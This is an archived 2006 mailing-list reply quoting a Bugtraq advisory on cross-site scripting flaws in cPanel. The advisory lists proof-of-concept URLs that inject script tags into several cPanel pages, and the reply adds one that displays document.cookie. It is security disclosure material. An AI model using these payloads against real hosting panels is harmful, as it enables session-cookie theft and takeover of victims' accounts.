[<prev] [next>] [day] [month] [year] [list]
Message-ID: <489d2f300602072145t5bc99ccdl6ada6d30234a4e49@mail.gmail.com>
Date: Wed Feb 8 05:46:04 2006
From: sumit.siddharth at gmail.com (Sumit Siddharth)
Subject: Re: cPanel Multiple Cross Site Scripting
Vulnerability
One more to ur list
http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder
Sumit
On 2/4/06, Hamish Stanaway <koremeltdown@...mail.com> wrote:
>
> Hi there,
>
> Thank you for finding this vulnerability in a widely used software. I was
> wondering if you had a solution or a work around to this issue?
>
>
>
> Kindest of regards,
>
> Hamish Stanaway, CEO
>
> Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
> Auckland, New Zealand
>
> http://www.webhosting.net.nz
> http://www.buywebhosting.co.nz
> http://www.koreworks.com
>
>
>
>
>
> >From: simo@...x.org
> >To: bugtraq@...urityfocus.com
> >Subject: cPanel Multiple Cross Site Scripting Vulnerability
> >Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
> >MIME-Version: 1.0
> >Received: from outgoing.securityfocus.com ([205.206.231.27]) by
> >bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri,
> 3
> >Feb 2006 08:56:14 -0800
> >Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
> > via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3
> Feb
> >2006 08:33:09 -0800
> >Received: from lists2.securityfocus.com (lists2.securityfocus.com
> >[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
> >803C22370A5; Fri, 3 Feb 2006 08:16:33 -0700 (MST)
> >Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000
> >X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA=
> >Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
> >Precedence: bulk
> >List-Id: <bugtraq.list-id.securityfocus.com>
> >List-Post: <mailto:bugtraq@...urityfocus.com>
> >List-Help: <mailto:bugtraq-help@...urityfocus.com>
> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
> >List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
> >Delivered-To: mailing list bugtraq@...urityfocus.com
> >Delivered-To: moderator for bugtraq@...urityfocus.com
> >User-Agent: SquirrelMail/1.4.4
> >X-AntiAbuse: This header was added to track abuse, please include it with
> >any abuse report
> >X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
> >X-AntiAbuse: Original Domain - securityfocus.com
> >X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12]
> >X-AntiAbuse: Sender Address Domain - morx.org
> >X-Source: X-Source-Args: X-Source-Dir: Return-Path:
> >bugtraq-return-23195-koremeltdown=hotmail.com@...urityfocus.com
> >X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC)
> >FILETIME=[BE6AAD60:01C628E2]
> >
> >Title: cPanel Multiple Cross Site Scripting
> >
> >Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> >Discovered: 22 january 2005
> >Published: 02 february 2006
> >MorX Security Research Team
> >http://www.morx.org
> >
> >Service: Web Hosting Manager
> >
> >Vendor: cPanel
> >
> >Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
> >
> >Severity: Medium/High
> >
> >Details:
> >
> >cPanel (control panel) is a graphical web-based management tool, designed
> >to make administration of web sites as easy as possible. cPanel handles
> >all aspects of website administration in an easy-to-use interface.
> >The software, which is proprietary, runs on a number of popular RPM-based
> >Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
> >Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
> >accessed on ports 2082 and 2083 (for a SSL version). Authentication is
> >either via HTTP or web page login. cPanel is prone to cross-site
> scripting
> >attacks. This problem is due to a failure in the application to properly
> >sanitize user-supplied input
> >
> >
> >
> >Impact:
> >
> >an attacker can exploit the vulnerable scripts to have arbitrary script
> >code executed in the browser of an authentified cPanel user in the
> context
> >of the website hosting the vulnerable cPanel version. resulting in the
> >theft of cookie-based authentication giving the attacker full access to
> >the victim's cPanel account as well as other type of attacks.
> >
> >
> >Affected scripts with proof of concept exploit:
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
> <script>alert('vul')</script>&domain=
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
> <script>alert('vul')</script>&domain=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
> "><script>alert('vul')</script>
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
> "><script>alert('vul')</script>
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
> "><script>alert('vul')</script>&target=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
> "><script>alert('vul')</script>&domain=xxx&target=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
> "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
> >
> >
> >Disclaimer:
> >
> >this entire document is for eductional, testing and demonstrating purpose
> >only. Modification use and/or publishing this information is entirely on
> >your OWN risk. The information provided in this advisory is to be
> >used/tested on your OWN machine/Account. I cannot be held responsible for
> >any of the above.
>
>
>
--
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060208/b7f64c9b/attachment.html
Powered by blists - more mailing lists